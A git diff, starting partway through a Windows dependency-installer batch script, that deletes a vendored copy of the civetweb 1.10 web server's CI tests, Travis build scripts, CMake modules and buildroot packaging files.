-    call :download "%file_path%" "%exe_path%" %checksum%
-    if errorlevel 1 (
-      call :log 0 "Failed to download the %name% dependency"
-      exit /b 1
-    )
-  )
-) else (
-  call :log 2 "Copying installer %file_path% to %exe_path%"
-  call :log 7
-  if not exist "%exe_path%" (
-    xcopy /q /y /z "%file_path%" "%exe_path%" 1>nul
-    if errorlevel 1 (
-      call :log 0 "Failed to copy the Nullsoft Installer"
-      exit /b 1
-    )
-  )
-)
-@call :log 1 "Running the %exe%"
-@call :log 6
-@"%exe_path%" /S
-@set nsis_errorlevel=%errorlevel%
-@if %nsis_errorlevel% equ 0 goto install_nsis_success
-@if %nsis_errorlevel% equ 3010 goto install_nsis_success_reboot
-@if %nsis_errorlevel% equ 1641 goto install_nsis_success_reboot
-@if %nsis_errorlevel% equ 3015 goto install_nsis_in_progress_reboot
-@if %nsis_errorlevel% equ 1615 goto install_nsis_in_progress_reboot
-@call :log 0 "Nullsoft Installer failed: %nsis_errorlevel%"
-@call :log 0 "Install the dependency manually by running %exe_path%"
-@exit /b 1
-:install_nsis_in_progress_reboot
-@call :log 0 "The installation requires a reboot to continue"
-@call :log 5
-@call :reboot
-@exit /b 1
-:install_nsis_success_reboot
-@call :log 3 "The installation requires a reboot to be fully functional"
-@set reboot_required=1
-:install_nsis_success
-@call :log 2 "Successfully installed %name%"
-@call :log 7
-@endlocal & set reboot_required=%reboot_required%
-@goto :eof
-
-:reboot - Asks the user if they would like to reboot then stops the script
-@setlocal
-@call :log 6 "-------------------------------------------"
-@choice /C YN /T 60 /D N /M "The %method% requires a reboot, reboot now?"
-@set ret=%errorlevel%
-@call :log 6
-@if %ret% equ 1 (
-  @shutdown /r
-) else (
-  @call :log 0 "You will need to reboot to complete the %method%"
-  @call :log 5
-)
-@endlocal
-@goto :eof
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua b/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua
deleted file mode 100644
index cf3b300..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua
+++ /dev/null
@@ -1,35 +0,0 @@
-civet = require "ci/test/civet"
-local curl = require "cURL"
-
-describe("civetweb basic", function()
-
-  setup(function()
-    civet.start()
-  end)
-
-  teardown(function()
-    civet.stop()
-  end)
-
-
-  it("should serve a simple get request", function()
-
-    local out = ""
-    function capture(str)
-      out = out .. str
-    end
-
-    local c = curl.easy()
-      :setopt_url('http://localhost:' .. civet.port .. "/")
-      :setopt_writefunction(capture)
-      :perform()
-    :close()
-
-    --print('rescode:' .. c.getinfo(curl.INFO_RESPONSE_CODE))
-
-    assert.are.equal('Index of', string.match(out, 'Index of'))
-    assert.are.equal('01_basic_test_dir', string.match(out, '01_basic_test_dir'))
-    assert.are.equal('01_basic_test_file', string.match(out, '01_basic_test_file'))
-  end)
-
-end)
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir b/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir
+++ /dev/null
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file b/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file
+++ /dev/null
diff --git a/thirdparty/civetweb-1.10/ci/test/README.md b/thirdparty/civetweb-1.10/ci/test/README.md
deleted file mode 100644
index fdbecbe..0000000
--- a/thirdparty/civetweb-1.10/ci/test/README.md
+++ /dev/null
@@ -1,34 +0,0 @@
-== Travis CI Tests
-
-Travis is a service which will build your project when you commit or get pull requests on Github.
-
-I have fixed and extended the travis configuration to build on the new sudo-less docker infrastructure.
-
-=== CI Process
-
-* On Check-in or Pull Requests clone the repo
-* Run make WITH_LUA=1 WITH_DEBUG=1 WITH_IPV6=1 WITH_WEBSOCKET=1
-* Build a standalone lua installation (seperate from civetweb or the OS)
-* Build LuaRocks in standalone installation
-* Install a few rocks into the standalone installation
-* Start the test script
-
-=== test/ci_tests/01_basic/basic_spec.lua
-
-On the initial checkin, there is only one test which demonstrates:
-
-* reliably starting civetweb server on travis infrastructure
-* waiting (polling) with lua.socket to establish the server is up and running 
-* using libcurl via lua to test that files in the specified docroot are available
-* kill the civetweb server process
-* waiting (polling) the server port to see that the server has freed it
-
-=== Adding Tests
-
-* Create a directory under ci_tests
-* Add a spec file, so now we have ci_tests/02_my_awesome_test/awesome_spec.lua
-* Any file under ci_tests which ends in _spec.lua will be automatically run
-* Check out the 'busted' and lua-curl3 docs for more info
-* https://github.com/Lua-cURL/Lua-cURLv3
-* http://olivinelabs.com/busted/
-
diff --git a/thirdparty/civetweb-1.10/ci/test/civet.lua b/thirdparty/civetweb-1.10/ci/test/civet.lua
deleted file mode 100644
index 19a6848..0000000
--- a/thirdparty/civetweb-1.10/ci/test/civet.lua
+++ /dev/null
@@ -1,42 +0,0 @@
-socket = require "socket"
-
-local civet = {}
-
--- default params
-civet.port=12345
-civet.max_retry=100
-civet.start_delay=0.1
-
-function civet.start(docroot)
-  -- TODO: use a property
-  docroot = docroot or 'ci/test/01_basic/docroot'
-  assert(io.popen('./civetweb'
-  .. " -listening_ports " .. civet.port
-  .. " -document_root " .. docroot
-  .. " > /dev/null 2>&1 &"
-  ))
-  -- wait until the server answers
-  for i=1,civet.max_retry do
-    local s = socket.connect('127.0.0.1', civet.port)
-    if s then
-      s:close()
-      break
-    end
-    socket.select(nil, nil, civet.start_delay) -- sleep
-  end
-end
-
-function civet.stop()
-  os.execute('killall civetweb')
-  -- wait until the server port closes
-  for i=1,civet.max_retry do
-    local s = socket.connect('127.0.0.1', civet.port)
-    if not s then
-      break
-    end
-    s:close()
-    socket.select(nil, nil, civet.start_delay) -- sleep
-  end
-end
-
-return civet
diff --git a/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh b/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh
deleted file mode 100755
index 739248b..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh
+++ /dev/null
@@ -1,14 +0,0 @@
-#!/usr/bin/env bash
-set -ev
-
-source ci/travis/lua_env.sh
-
-# add any rocks required for ci_tests to this list
-# lua-curl depends on a libcurl development package (i.e. libcurl4-openssl-dev)
-ROCKS=(lua-curl busted)
-
-for ROCK in ${ROCKS[*]}
-do
-  $LUAROCKS install $ROCK
-done
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/lua_env.sh b/thirdparty/civetweb-1.10/ci/travis/lua_env.sh
deleted file mode 100755
index dd742e9..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/lua_env.sh
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/usr/bin/env bash
-
-LUAROCKS=ci/lua/bin/luarocks
-eval $($LUAROCKS path --bin)
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/platform.sh b/thirdparty/civetweb-1.10/ci/travis/platform.sh
deleted file mode 100755
index 4a3af0d..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/platform.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-if [ -z "$PLATFORM" ]; then
-  PLATFORM=$TRAVIS_OS_NAME;
-fi
-
-if [ "$PLATFORM" == "osx" ]; then
-  PLATFORM="macosx";
-fi
-
-if [ -z "$PLATFORM" ]; then
-  if [ "$(uname)" == "Linux" ]; then
-    PLATFORM="linux";
-  else
-    PLATFORM="macosx";
-  fi;
-fi
diff --git a/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh b/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh
deleted file mode 100755
index 16c2cc0..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/usr/bin/env bash
-set -ev
-
-source ci/travis/lua_env.sh
-busted -o TAP ci/test/
-
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh b/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh
deleted file mode 100755
index 8e1b324..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh
+++ /dev/null
@@ -1,61 +0,0 @@
-#!/usr/bin/env /bash
-set -ev
-
-# this script installs a lua / luarocks environment in .travis/lua
-# this is necessary because travis docker architecture (the fast way)
-# does not permit sudo, and does not contain a useful lua installation
-
-# After this script is finished, you can configure your environment to
-# use it by sourcing lua_env.sh
-
-source ci/travis/platform.sh
-
-# The current versions when this script was written
-LUA_VERSION=5.2.4
-LUAROCKS_VERSION=2.2.2
-
-# directory where this script is located
-SCRIPT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
-
-# civetweb base dir
-PROJECT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )"/../.. && pwd )
-
-# fetch and unpack lua src
-cd $SCRIPT_DIR
-LUA_BASE=lua-$LUA_VERSION
-rm -rf $LUA_BASE
-curl http://www.lua.org/ftp/$LUA_BASE.tar.gz | tar zx
-
-# build lua
-cd $LUA_BASE
-make $PLATFORM
-make local
-
-# mv built lua install to target Lua dir
-LUA_DIR=$PROJECT_DIR/ci/lua
-rm -rf $LUA_DIR
-mv $SCRIPT_DIR/$LUA_BASE/install $LUA_DIR
-
-# add to path required by luarocks installer
-export PATH=$LUA_DIR/bin:$PATH
-
-
-# fetch and unpack luarocks
-cd $SCRIPT_DIR
-LUAROCKS_BASE=luarocks-$LUAROCKS_VERSION
-rm -rf ${LUAROCKS_BASE}
-LUAROCKS_URL=http://luarocks.org/releases/${LUAROCKS_BASE}.tar.gz
-# -L because it's a 302 redirect
-curl -L $LUAROCKS_URL | tar xzp
-cd $LUAROCKS_BASE
-
-# build luarocks
-./configure --prefix=$LUA_DIR
-make build
-make install
-
-# cleanup source dirs
-cd $SCRIPT_DIR
-rm -rf $LUAROCKS_BASE
-rm -rf $LUA_BASE
-
diff --git a/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake b/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake
deleted file mode 100644
index f5550fa..0000000
--- a/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake
+++ /dev/null
@@ -1,38 +0,0 @@
-# - Adds a compiler flag if it is supported by the compiler
-#
-# This function checks that the supplied compiler flag is supported and then
-# adds it to the corresponding compiler flags
-#
-#  add_c_compiler_flag(<FLAG> [<VARIANT>])
-#
-# - Example
-#
-# include(AddCCompilerFlag)
-# add_c_compiler_flag(-Wall)
-# add_c_compiler_flag(-no-strict-aliasing RELEASE)
-# Requires CMake 2.6+
-
-if(__add_c_compiler_flag)
-  return()
-endif()
-set(__add_c_compiler_flag INCLUDED)
-
-include(CheckCCompilerFlag)
-
-function(add_c_compiler_flag FLAG)
-  string(TOUPPER "HAVE_C_FLAG_${FLAG}" SANITIZED_FLAG)
-  string(REPLACE "+" "X" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "[^A-Za-z_0-9]" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "_+" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  set(CMAKE_REQUIRED_FLAGS "${FLAG}")
-  check_c_compiler_flag("" ${SANITIZED_FLAG})
-  if(${SANITIZED_FLAG})
-    set(VARIANT ${ARGV1})
-    if(ARGV1)
-      string(REGEX REPLACE "[^A-Za-z_0-9]" "_" VARIANT "${VARIANT}")
-      string(TOUPPER "_${VARIANT}" VARIANT)
-    endif()
-    set(CMAKE_C_FLAGS${VARIANT} "${CMAKE_C_FLAGS${VARIANT}} ${FLAG}" PARENT_SCOPE)
-  endif()
-endfunction()
-
diff --git a/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake b/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake
deleted file mode 100644
index 5e58c6d..0000000
--- a/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake
+++ /dev/null
@@ -1,38 +0,0 @@
-# - Adds a compiler flag if it is supported by the compiler
-#
-# This function checks that the supplied compiler flag is supported and then
-# adds it to the corresponding compiler flags
-#
-#  add_cxx_compiler_flag(<FLAG> [<VARIANT>])
-#
-# - Example
-#
-# include(AddCXXCompilerFlag)
-# add_cxx_compiler_flag(-Wall)
-# add_cxx_compiler_flag(-no-strict-aliasing RELEASE)
-# Requires CMake 2.6+
-
-if(__add_cxx_compiler_flag)
-  return()
-endif()
-set(__add_cxx_compiler_flag INCLUDED)
-
-include(CheckCXXCompilerFlag)
-
-function(add_cxx_compiler_flag FLAG)
-  string(TOUPPER "HAVE_CXX_FLAG_${FLAG}" SANITIZED_FLAG)
-  string(REPLACE "+" "X" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "[^A-Za-z_0-9]" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "_+" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  set(CMAKE_REQUIRED_FLAGS "${FLAG}")
-  check_cxx_compiler_flag("" ${SANITIZED_FLAG})
-  if(${SANITIZED_FLAG})
-    set(VARIANT ${ARGV1})
-    if(ARGV1)
-      string(REGEX REPLACE "[^A-Za-z_0-9]" "_" VARIANT "${VARIANT}")
-      string(TOUPPER "_${VARIANT}" VARIANT)
-    endif()
-    set(CMAKE_CXX_FLAGS${VARIANT} "${CMAKE_CXX_FLAGS${VARIANT}} ${FLAG}" PARENT_SCOPE)
-  endif()
-endfunction()
-
diff --git a/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake b/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake
deleted file mode 100644
index 7d18213..0000000
--- a/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake
+++ /dev/null
@@ -1,47 +0,0 @@
-# - Determines the target architecture of the compilation
-#
-# This function checks the architecture that will be built by the compiler
-# and sets a variable to the architecture
-#
-#  determine_target_architecture(<OUTPUT_VAR>)
-#
-# - Example
-#
-# include(DetermineTargetArchitecture)
-# determine_target_architecture(PROJECT_NAME_ARCHITECTURE)
-
-if(__determine_target_architecture)
-  return()
-endif()
-set(__determine_target_architecture INCLUDED)
-
-function(determine_target_architecture FLAG)
-  if (MSVC)
-    if("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "X86")
-      set(ARCH "i686")
-    elseif("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "x64")
-      set(ARCH "x86_64")
-    elseif("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "ARM")
-      set(ARCH "arm")
-    else()
-      message(FATAL_ERROR "Failed to determine the MSVC target architecture: ${MSVC_C_ARCHITECTURE_ID}")
-    endif()
-  else()
-    execute_process(
-      COMMAND ${CMAKE_C_COMPILER} -dumpmachine
-      RESULT_VARIABLE RESULT
-      OUTPUT_VARIABLE ARCH
-      ERROR_QUIET
-    )
-    if (RESULT)
-      message(FATAL_ERROR "Failed to determine target architecture triplet: ${RESULT}")
-    endif()
-    string(REGEX MATCH "([^-]+).*" ARCH_MATCH ${ARCH})
-    if (NOT CMAKE_MATCH_1 OR NOT ARCH_MATCH)
-      message(FATAL_ERROR "Failed to match the target architecture triplet: ${ARCH}")
-    endif()
-    set(ARCH ${CMAKE_MATCH_1})
-  endif()
-  message(STATUS "Target architecture - ${ARCH}")
-  set(FLAG ${ARCH} PARENT_SCOPE)
-endfunction()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake b/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake
deleted file mode 100644
index c018d92..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake
+++ /dev/null
@@ -1,46 +0,0 @@
-#.rst:
-# FindLibDl
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBDL::LIBDL``, if
-# LIBDL has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBDL_INCLUDE_DIRS  - where to find dlfcn.h, etc.
-#   LIBDL_LIBRARIES     - List of libraries when using libdl.
-#   LIBDL_FOUND         - True if dynamic linking library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBDL_ROOT`` to a library installation root to tell this
-# module where to look.
-
-find_path(LIBDL_INCLUDE_DIRS
-  NAMES dlfcn.h
-  PATHS ${LIBDL_ROOT}/include/
-)
-find_library(LIBDL_LIBRARIES dl)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibDl DEFAULT_MSG LIBDL_LIBRARIES LIBDL_INCLUDE_DIRS)
-mark_as_advanced(LIBDL_INCLUDE_DIRS LIBDL_LIBRARIES)
-
-if(LIBDL_FOUND)
-    if(NOT TARGET LIBDL::LIBDL)
-      add_library(LIBDL::LIBDL UNKNOWN IMPORTED)
-      set_target_properties(LIBDL::LIBDL PROPERTIES
-        IMPORTED_LOCATION "${LIBDL_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBDL_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibM.cmake b/thirdparty/civetweb-1.10/cmake/FindLibM.cmake
deleted file mode 100644
index 9f42aa4..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibM.cmake
+++ /dev/null
@@ -1,47 +0,0 @@
-#.rst:
-# FindLibM
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBM::LIBM``, if
-# LIBM has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBM_INCLUDE_DIRS  - where to find math.h, etc.
-#   LIBM_LIBRARIES     - List of libraries when using libm.
-#   LIBM_FOUND         - True if math library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBM_ROOT`` to a math library installation root to tell this
-# module where to look.
-
-find_path(LIBM_INCLUDE_DIRS
-  NAMES math.h
-  PATHS /usr/include /usr/local/include /usr/local/bic/include
-  NO_DEFAULT_PATH
-)
-find_library(LIBM_LIBRARIES m)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibM DEFAULT_MSG LIBM_LIBRARIES LIBM_INCLUDE_DIRS)
-mark_as_advanced(LIBM_INCLUDE_DIRS LIBM_LIBRARIES)
-
-if(LIBM_FOUND)
-    if(NOT TARGET LIBM::LIBM)
-      add_library(LIBM::LIBM UNKNOWN IMPORTED)
-      set_target_properties(LIBM::LIBM PROPERTIES
-        IMPORTED_LOCATION "${LIBM_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBM_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake b/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake
deleted file mode 100644
index c496edf..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake
+++ /dev/null
@@ -1,46 +0,0 @@
-#.rst:
-# FindLibRt
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBRT::LIBRT``, if
-# LIBRT has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBRT_INCLUDE_DIRS  - where to find time.h, etc.
-#   LIBRT_LIBRARIES     - List of libraries when using librt.
-#   LIBRT_FOUND         - True if realtime library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBRT_ROOT`` to a realtime installation root to tell this
-# module where to look.
-
-find_path(LIBRT_INCLUDE_DIRS
-  NAMES time.h
-  PATHS ${LIBRT_ROOT}/include/
-)
-find_library(LIBRT_LIBRARIES rt)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibRt DEFAULT_MSG LIBRT_LIBRARIES LIBRT_INCLUDE_DIRS)
-mark_as_advanced(LIBRT_INCLUDE_DIRS LIBRT_LIBRARIES)
-
-if(LIBRT_FOUND)
-    if(NOT TARGET LIBRT::LIBRT)
-      add_library(LIBRT::LIBRT UNKNOWN IMPORTED)
-      set_target_properties(LIBRT::LIBRT PROPERTIES
-        IMPORTED_LOCATION "${LIBRT_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBRT_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake b/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake
deleted file mode 100644
index 0bf355d..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake
+++ /dev/null
@@ -1,102 +0,0 @@
-#.rst:
-# FindWinSock
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``WINSOCK::WINSOCK``, if
-# WINSOCK has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   WINSOCK_INCLUDE_DIRS  - where to find winsock.h, etc.
-#   WINSOCK_LIBRARIES     - List of libraries when using librt.
-#   WINSOCK_FOUND         - True if realtime library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``WINSOCK_ROOT`` to a realtime installation root to tell this
-# module where to look.
-
-macro(REMOVE_DUPLICATE_PATHS LIST_VAR)
-  set(WINSOCK_LIST "")
-  foreach(PATH IN LISTS ${LIST_VAR})
-    get_filename_component(PATH "${PATH}" REALPATH)
-    list(APPEND WINSOCK_LIST "${PATH}")
-  endforeach(PATH)
-  set(${LIST_VAR} ${WINSOCK_LIST})
-  list(REMOVE_DUPLICATES ${LIST_VAR})
-endmacro(REMOVE_DUPLICATE_PATHS)
-
-set(WINSOCK_INCLUDE_PATHS "${WINSOCK_ROOT}/include/")
-if(MINGW)
-  execute_process(
-    COMMAND ${CMAKE_C_COMPILER} -xc -E -v -
-    RESULT_VARIABLE RESULT
-    INPUT_FILE nul
-    ERROR_VARIABLE ERR
-    OUTPUT_QUIET
-  )
-  if (NOT RESULT)
-    string(FIND "${ERR}" "#include <...> search starts here:" START)
-    string(FIND "${ERR}" "End of search list." END)
-    if (NOT ${START} EQUAL -1 AND NOT ${END} EQUAL -1)
-      math(EXPR START "${START} + 36")
-      math(EXPR END "${END} - 1")
-      math(EXPR LENGTH "${END} - ${START}")
-      string(SUBSTRING "${ERR}" ${START} ${LENGTH} WINSOCK_INCLUDE_PATHS)
-      string(REPLACE "\n " ";" WINSOCK_INCLUDE_PATHS "${WINSOCK_INCLUDE_PATHS}")
-      list(REVERSE WINSOCK_INCLUDE_PATHS)
-    endif()
-  endif()
-endif()
-remove_duplicate_paths(WINSOCK_INCLUDE_PATHS)
-
-set(WINSOCK_LIBRARY_PATHS "${WINSOCK_ROOT}/lib/")
-if(MINGW)
-  execute_process(
-    COMMAND ${CMAKE_C_COMPILER} -print-search-dirs
-    RESULT_VARIABLE RESULT
-    OUTPUT_VARIABLE OUT
-    ERROR_QUIET
-  )
-  if (NOT RESULT)
-    string(REGEX MATCH "libraries: =([^\r\n]*)" OUT "${OUT}")
-    list(APPEND WINSOCK_LIBRARY_PATHS "${CMAKE_MATCH_1}")
-  endif()
-endif()
-if (${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "AMD64" AND ${CMAKE_SIZEOF_VOID_P} EQUAL 4)
-  list(APPEND WINSOCK_LIBRARY_PATHS "C:/Windows/SysWOW64")
-endif()
-list(APPEND WINSOCK_LIBRARY_PATHS "C:/Windows/System32")
-remove_duplicate_paths(WINSOCK_LIBRARY_PATHS)
-
-find_path(WINSOCK_INCLUDE_DIRS
-  NAMES winsock2.h
-  PATHS ${WINSOCK_INCLUDE_PATHS}
-)
-find_library(WINSOCK_LIBRARIES ws2_32
-  PATHS ${WINSOCK_LIBRARY_PATHS}
-  NO_DEFAULT_PATH
-)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(WinSock DEFAULT_MSG WINSOCK_LIBRARIES WINSOCK_INCLUDE_DIRS)
-mark_as_advanced(WINSOCK_INCLUDE_DIRS WINSOCK_LIBRARIES)
-
-if(WINSOCK_FOUND)
-    if(NOT TARGET WINSOCK::WINSOCK)
-      add_library(WINSOCK::WINSOCK UNKNOWN IMPORTED)
-      set_target_properties(WINSOCK::WINSOCK PROPERTIES
-        IMPORTED_LOCATION "${WINSOCK_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${WINSOCK_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch b/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
deleted file mode 100644
index e16ea1f..0000000
--- a/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From c82fe8888aacfe784476112edd3878256d2e30bc Mon Sep 17 00:00:00 2001
-From: Joshua Boyd <jdboyd@Joshua-Boyds-Mac-mini.local>
-Date: Wed, 23 Mar 2016 17:54:41 -0400
-Subject: [PATCH] Detect missing itimerspec on OSX.
-
-Set define to compiler accordingly.
-
-This fixes cmake on osx support.
----
- CMakeLists.txt | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/CMakeLists.txt b/CMakeLists.txt
-index e271e31..1d413e8 100644
---- a/CMakeLists.txt
-+++ b/CMakeLists.txt
-@@ -193,6 +193,14 @@ if(NOT HAVE_SYS_TIME_H)
-     endif(MSVC)
- endif(NOT HAVE_SYS_TIME_H)
- 
-+# OSX has sys/time.h, but it still lacks itimerspec
-+if(HAVE_SYS_TIME_H)
-+    check_struct_member("struct itimerspec" it_value "sys/time.h" HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+    if(NOT HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+        add_definitions(-DSTRUCT_ITIMERSPEC_DEFINITION_MISSING=1)
-+        set(STRUCT_ITIMERSPEC_DEFINITION_MISSING 1)
-+    endif(NOT HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+endif(HAVE_SYS_TIME_H)
- 
- ###############################################################################
- # Check for integer types
diff --git a/thirdparty/civetweb-1.10/cmake/check/patch.cmake b/thirdparty/civetweb-1.10/cmake/check/patch.cmake
deleted file mode 100644
index 472d392..0000000
--- a/thirdparty/civetweb-1.10/cmake/check/patch.cmake
+++ /dev/null
@@ -1,12 +0,0 @@
-message(STATUS "Patching check ${VERSION} ${SOURCE_DIR}")
-
-# Patch checks for MinGW
-# https://sourceforge.net/p/check/patches/53/
-set(CMAKE_LISTS_LOCATION "${SOURCE_DIR}/CMakeLists.txt")
-file(READ ${CMAKE_LISTS_LOCATION} CMAKE_LISTS)
-string(REGEX REPLACE
-  "(check_type_size\\((clock|clockid|timer)_t [A-Z_]+\\)[\r\n]+[^\r\n]+[\r\n]+[^\r\n]+[\r\n]+endif\\(NOT HAVE[A-Z_]+\\))"
-  "set(CMAKE_EXTRA_INCLUDE_FILES time.h)\n\\1\nunset(CMAKE_EXTRA_INCLUDE_FILES)"
-  CMAKE_LISTS "${CMAKE_LISTS}")
-file(WRITE ${CMAKE_LISTS_LOCATION} "${CMAKE_LISTS}")
-message(STATUS "Patched ${CMAKE_LISTS_LOCATION}")
diff --git a/thirdparty/civetweb-1.10/contrib/buildroot/Config.in b/thirdparty/civetweb-1.10/contrib/buildroot/Config.in
deleted file mode 100644
index 2334fdf..0000000
--- a/thirdparty/civetweb-1.10/contrib/buildroot/Config.in
+++ /dev/null
@@ -1,26 +0,0 @@
-config BR2_PACKAGE_CIVETWEB
-	bool "civetweb"
-	depends on BR2_TOOLCHAIN_HAS_THREADS
-	help
-	  Full featured embedded web server with Lua support.
-	  
-	  https://sourceforge.net/projects/civetweb
-
-if BR2_PACKAGE_CIVETWEB
-
-config BR2_CIVETWEB_WITH_LUA
-	bool "enable Lua support"
-	# required by the bundled Sqlite3 and Lua code
-	depends on BR2_LARGEFILE
-	help
-	  Enable Lua support in Civetweb. Note that this will use a
-	  version of Lua and Sqlite bundled within the Civetweb
-	  sources, and not the packages from Buildroot.
-
-comment "Lua support requires largefile support in toolchain"
-	depends on !BR2_LARGEFILE
-
-endif
-
-comment "civetweb requires a toolchain with PTHREAD support"
-	depends on !BR2_TOOLCHAIN_HAS_THREADS
diff --git a/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk b/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk
deleted file mode 100644
index 8b9b7de..0000000
--- a/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk
+++ /dev/null
@@ -1,55 +0,0 @@
-################################################################################
-#
-# civetweb
-#
-################################################################################
-
-CIVETWEB_VERSION = 1.10
-CIVETWEB_SITE = http://github.com/civetweb/civetweb/tarball/v$(CIVETWEB_VERSION)
-CIVETWEB_LICENSE = MIT
-CIVETWEB_LICENSE_FILES = LICENSE.md
-
-CIVETWEB_CONF_OPT = TARGET_OS=LINUX
-CIVETWEB_COPT = $(TARGET_CFLAGS) -DHAVE_POSIX_FALLOCATE=0
-CIVETWEB_LDFLAGS = $(TARGET_LDFLAGS)
